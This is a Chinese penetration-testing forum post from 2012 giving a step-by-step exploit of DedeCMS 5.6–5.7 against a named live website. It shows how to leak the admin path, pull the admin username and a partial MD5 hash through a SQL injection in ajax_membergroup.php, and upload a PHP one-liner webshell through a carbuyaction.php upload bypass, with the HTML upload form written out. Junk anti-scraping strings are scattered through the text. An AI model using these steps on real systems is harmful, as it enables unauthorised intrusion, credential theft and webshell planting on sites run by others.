中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
( q# M2 U1 P1 E& i: I这站 http://www.political-security.com/9 q+ r5 w, I( U8 h) h  _+ h
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,8 w6 f) m# t! A! [5 ~9 ~% V" w
www.political-security.com/data/mysql_error_trace.inc 爆后台
& T% h8 f& b/ G3 `) b然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
) M# d6 g! Y) I% Q5 _然后写上语句
; l7 A1 W7 ^7 }3 i# L1 Y查看管理员帐号! l1 P2 q8 [- O) s
http://www.political-security.co ... &membergroup=@`7 }! m; U) c6 Z( k
  @( `% s/ x1 V
admin - Z# N  D" M/ u# m5 z
+ \0 t( X) z" {3 _* m
查看管理员密码
0 K1 f3 q  p( i3 K. L; H4 a http://www.political-security.co ... &membergroup=@`
, U  s, U! a' k2 C1 A6 _7 A$ {/ _$ Q7 ^0 Z1 [; M
8d29b1ef9f8c5a5af429
2 H+ g  G+ T9 A% O/ J* B1 a
$ H+ n+ t* q, `$ r! {9 p0 b查看管理员密码
( u; V1 ~# n0 y, l. e. r& w7 x7 w- c, c
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# [, R& b2 t7 a/ o

& c% |5 u' I5 ?9 `( W# S8d2+ N5 f) c% K. A- W2 f2 s
9b1ef9f8c5a5af42" F6 y. t0 |+ ^8 s6 a( D
9, a$ b% ~1 O& j8 L/ k
# B/ R6 o, E9 n/ }% _, D
cmd5没解出来 只好测试第二个方法
1 @/ j" C) j$ P
9 Y5 h% M4 X& r% x
6 F3 \: `" b5 w②上传漏洞:  t) A8 w; D  X% R9 z
% M+ ^% Z& w/ Y- N8 ~" f: T  K
只要登陆会员中心,然后访问页面链接
; ^9 s- X! U: c9 s“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”% q  `6 C$ O9 n2 u. E% s! c
# _9 C  p& l+ A/ X, @8 j5 P$ [9 O
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
) [' q0 E5 z4 L. W; h# r0 B- p0 z: F( Y/ ~; v# W5 @% t- ~
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm6 }0 Y6 B: D; P) N

5 v. F( a5 }* `" O<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
* K9 r3 n- K; e* A7 S$ \7 I或者- t& v* v: a- ]& R8 B' j$ L
即可上传成功




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2